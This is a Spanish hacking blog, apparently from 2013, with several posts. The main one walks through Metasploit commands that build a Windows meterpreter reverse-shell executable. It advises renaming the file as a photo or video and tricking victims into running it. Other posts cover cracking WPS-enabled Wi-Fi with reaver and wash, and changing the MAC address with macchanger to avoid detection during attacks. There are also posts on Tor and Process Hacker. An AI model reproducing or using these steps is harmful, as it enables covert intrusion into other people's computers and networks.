Translate

viernes, 8 de marzo de 2013

Hackear windows 8 ó 7 con Backtrack 5


Hola, en este post mostraré una de las formas de vulnerar un pc con sistema operativo Windows 8 ó 7  (básicamente son los mismo). Para esto lo haré en Backtrack desde una VMware.
A tener en consideración:
  • Este es un ataque posible de realizar dentro de una red.
  • También es necesario tener un poco de conocimientos básicos en ingeniería social para poder engañar a la víctima y acepte nuestro archivo (exploit).
  • Más adelante mostraré un vídeo donde se aplica los códigos que expondré, en el vídeo se muestra el archivo exploit.exe como tal sin ser “encubierto”, pero si ustedes quieren crear un buen ataque, es bueno que tomen en cuenta aprender como se pueden transformar un archivo malicioso en un archivo que pase quizás como una simple foto.
  • Y por ultimo, no me hago responsable por el uso de lo que pueden aprender de esto.

Lo primero que necesitamos, es saber que es un exploit. Es un programa (software), programado para aprovechar las vulnerabilidades de sistemas informáticos. Que buscamos con un exploit? que nos de acceso a archivos de la victima, que nos permita escalar privilegios en la máquina de la victima, que nos de control (total) de una pc, eso a grandes rasgos.
Bueno para crear nuestro pequeño programa ocuparemos metasploit, que se ocupa desde la terminal escribiendo “msfconsole” (sin comillas)  y veremos algo así.

Ahora usaremos el siguiente comando.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 x > /root/exploit.exe 
  • En LHOST deben poner su ip local, la pueden ver abriendo una terminal nueva y escribiendo ifconfig.
  • LPORT tiene que ser el puerto 4444 solo déjenlo así.
  • /root/ es la carpeta donde quedara guardado el exploit que crearan, pueden cambiar esa ruta si desean y poner /root/Desktop/ para que el programa se guarde directamente en el escritorio.
  • exploit.exe es el programa que crearemos, pero ustedes pueden poner otro nombre para que ya no sea tan sospechoso, por ejemplo /foto.exe o /video.exe o lo que les parezca conveniente.
El segundo comando a usar es:
use exploit/multi/handler 
Con ese comando le damos la instrucción de que tipo de exploit usaremos.
Tercer comando:
set payload windows/meterpreter/reverse_tcp 
  • Con este comando, cramos el programa para windows.
  • Lo programamos para que la sesión a abrir sea mediante meterpreter.
  • y que sea reverse es que esperamos que la víctima no s de una respuesta para que se active el exploit.
Cuarto comando:
set lhost  (tu ip, ejemplo 192.168.0.1) 
Volvemos a poner la ip local, con esto al abrir el exploit la sesión será abierta en nuestra máquina. (cosa obvia)
Quinto y ultimo comando.
exploit
Esto simplemente crea el exploit con las características que ya le dimos.

Y ya tienen su exploit listo para enviárselo a alguien, una forma muy usada también es usar un servidor como 4shared y alojar su exploit ahí y luego que alguien lo baje, recuerden que siempre dentro de su red.

Bueno y dejaré el vídeo para que quede más claro aún.

saludos


lunes, 4 de marzo de 2013

Process Hacker


Process hacker es un potente analizador de procesos que proporciona información mucho más detallada que el administrador de tareas que viene en windows, nos permite saber que tipo y cuanta memoria ocupa cada aplicación con detalles, cuales archivos ocupa una aplicación en uso, tiempo de ejecución, si es un proceso de usario de sistema o un proceso nuevo.
Process hacker nos permite saber incluso si hay un proceso dañino trabajando en nuestra maquina, por ejemplo un troyano imitando otro proceso.



http://www.mediafire.com/?t6538smvsv8cg7d



Saludos


Navega como anónimo con Tor !




A muchos nos molesta el hecho que quizás hay alguien que sabe que hacemos, que páginas visitamos, que descargamos, etc… Esto lo puede hacer su ISP que sabe  a cada página que entra, claro no con el nombre pero si con su ip, por ejemplo si entra a google a su ISP le quedara registrada una entrada a google pero mediante la ip de la página por ejemplo parahttp://www.google.cl ellos tendrán la información que entramos a 190.45.0.100. Pueden ver la ip de una página haciendo un ping en cmd como se ve en la siguiente imagen.



Pero ya nos desviamos un poco del tema principal que es TOR, entonces que es TOR???  Es una red que nos permite la navegación en la red de forma anónima, para ser más sencillo y silvestre en la explicación en como si internet explorer les permitiera navegar de forma anónima sin que nadie pueda saber lo que hacen.
Como es posible?  Tor se basa en el enrutamiento .onion que es un mecanismos de codificado bajo llaves cifradas. Luego los paquetes son enviados a diferentes (muchos)  nodos, y los datos pasan  bajo capas de cifrado que van desapareciendo o son destruidas a medida que los datos avanzan. Y a modo sencillo los paquetes enviados pasan por lo menos 3 routers antes de llegar a su destino  incluyéndole a esto reouter intermedios de desconocida posición.
Tor fue desarrollado en Estado Unidos por la Armada, y fue creada para comunicaciones anónimas de su gobierno, tiempo después liberaron el código fuente al público.



Ahora bien por bueno que parezca si hay un lado malo, el ser anónimo en la red es una arma de doble filo ya que por un lado se protege la privacidad de las personas, hay otros que han ocupado esta red con fines negativos, como propagar pornografía infantil, ofrecer asesinos, o robar datos de programas entre muchas otras cosas, hay algo llamado la deep web que se podría definir como el submundo de la Internet, es algo desconocido para mucho y es para está parte que el uso de TOR es privilegiado, ya que en la deep web se encuentran los enfermos pedofilos, planos de bombas, sicarios a sueldo, un sin fin de virus, códigos fuente de programas, archivos muy interesantes como los de wikileaks, muy buenos troyanos entre muchas otras cosas algunas buenas y otras malas.


Pero la deep web es otro tema.
Bueno espero que esta información les sirva y ya saben TOR puede ser muy útil para estar pero no ser nadie (aunque creo que uno nunca es totalmente anónimo).
les dejo la pagina de descarga  https://www.torproject.org/

Saludos




Cambiar MAC con Backtrack 5


Hola, ya que en los pasados temas se trato el tema de las redes y como atacarlas, ahora hablare de un método de protegernos mientras realizamos un ataque a ellas, por ejemplo cuando queremos vulnerar una red usando reaver, la víctima puede ser “avisada” que su red esta comprometida y nos pueden descubrir mediante nuestra MAC, por eso para resguardarnos un poco tenemos la posibilidad de cambiarla. Ok pero veamos un poco que es la MAC,
Media access control (MAC) o en español “control de acceso al medio”  es una dirección física que es diferente para cada aparato que tenga una conexión de red.
Se vera de esta forma 00:11:22:33:44:55 son 6 bloques, y cada bloque es hexadecimal (por bloque 8 bits)
Como saber cual es nuestra MAC??
En windows abriendo una pantalla cmd y escribiendo  ipconfig/all y encontraran su dirección ip y otros datos, y su MAc debe estar donde dice dirección física.

y desde Linux abren una terminal y escriben ifconfig y buscan donde dice HWaddr 00:11:22:33:44:55 , se vera algo así.



Pero bueno ahora vamos a lo importante como cambiamos nuestra MAC usando Backtrack 5, lo haremos con macchanger, que cuenta con varias opciones pero hay tres que a mi parecer son las de mejor uso.
Bueno antes de cambiar la MAc hay que “bajar”  nuestra interfaz en mi caso será eth0 si ustedes ocupan red inalambrica debería ser wlan0, para esto en una terminal escribiremos.
ipconfig eth0 down  (eso es todo no les mostrara ningún mensaje de respuesta)
ahora vamos con la primera opción -e (ending) que cambia solo la ultima parte de nuestra MAC
macchanger -e eth0 (al hacer esto les mostrara en pantalla su MAC actual y una nueva que se llamara fake)
y para terminar el proceso es necesario volver a subir nuestra interfaz
ipconfig eth0 up (wlan0 en caso que ocupen un red inalambrica)
y con eso ya su MAC no sera la misma. Pero existen 2 opciones aún mas atractivas un es -r (random) que con el mismo proceso nos entrega una dirección física al azar totalmente distinta a la nuestra. Y la otra opción es -m esta nos permite a nosotros escribir nuestra propia MAC, por ejemplo si nuestra dirección fuera 00:11:22:33:44:55 usando la siguiente línea
macchanger -m 66:77:88:99:aa:bb eth0
nuestra nueva MAC sería esa.
Pero bueno si no les queda claro les dejo un vídeo donde lo hago paso por paso.





Saludos

Como saber si están activados los wps para poder usar reaver


Ya que el anterior post trato sobre reaver y su uso para módem que tuvieran o usaran wps en su configuración, esta entrada ayudara a ahorrarnos tiempo y saber si es posible realizar este ataque si el router o módem a vulnerar tiene activado el wps.
para esto también usare backtrack 5 y un comando sencillo. Pero antes también veremos rápidamente como comprobar esto usando wireshark que es una herramienta para analizar protocolos y se usa mucho para mantener cuidado de redes.
bueno para empezar es necesario poner la tarjeta en modo monitor en una terminal tecleando
airmon-ng start wlan0 (es wlancero) 
ya estando la tarjeta en modo monitor  procedemos a abrir wireshark colocamos nuestra interfaz que debería ser mon0 (moncero) y dejamos las casillas que siguen sin marcar. debería quedarles algo así.
si se ve así solo sigue darle start y que empiece a trabajar.
Luego de darle unos segundos a wireshark para que capture paquetes nos tenemos que fijar en estas líneas
—–>IEEE 802.11 wireless LAN management frame
———–>Tagged parameters:
————–> Tag: Vendor Specific: Microsoft WPS 


Si les aparece como en la captura pueden seguir y usar reaver si no busquen otra red. Bueno pero para el que le parece muy complicado seguir estos pasos, hay otra forma mucho mas sencilla desde la consola de backtrack con el comando wash. De esta forma
Wash -i (interfaz) con esto escaneara todas las redes cercanas y dirá si tienen tecnología WPS, si quieren ahorrar tiempo pueden dirigir su análisis directo a una red agregando al comando el BSSID  wash -i (interfaz) -b (BSSID). Pero para esto también les dejare un vídeo con su uso.  

Saludos



Vulnerabilidad en tu red domestica. Como romper redes wpa/wpa2


Hola en este primer post hablaremos sobre las redes wpa/wpa2 y una herramienta muy efectiva para romper su seguridad, reaver.
Que es reaver? es una aplicación open source que permite atacar redes wpa que tengan el wps activado, usando fuerza bruta probando primero una parte del pin y después la segunda. ok pero entonces…..que es wps?
WPSWi-Fi Protected Setup no es lo que uno imagina una seguridad como tal para tu red, no es un mecanismo de seguridad en sí, en palabras simples es una ayuda para los usuarios comunes para poder configurar con mas facilidad su red wlan. El wps te entrega un PIN haciendo esto que tu red sea impenetrable o por lo menos esa es su función.
Bueno volvamos con reaver que es de uso muy sencillo y más aún si te familiarizas con linux y el uso de la terminal. Reaver lo que va haciendo es tirar pin’s durante su ataque y viendo cual coincide con tu router o módem, este proceso puede durar bastante un ataque completo con reaver puede tardar unos 10 minutos como se puede alargar por varias horas.
un ejemplo sencillo de usar reaver seria en una terminal escribir:
reaver -i (interfaz que uses) -b (bssid) -c (canal de la señal)   
pero para que quede más claro su uso dejare un vídeo de mi propiedad donde uso backtrack 5  junto a aircrack y reaver.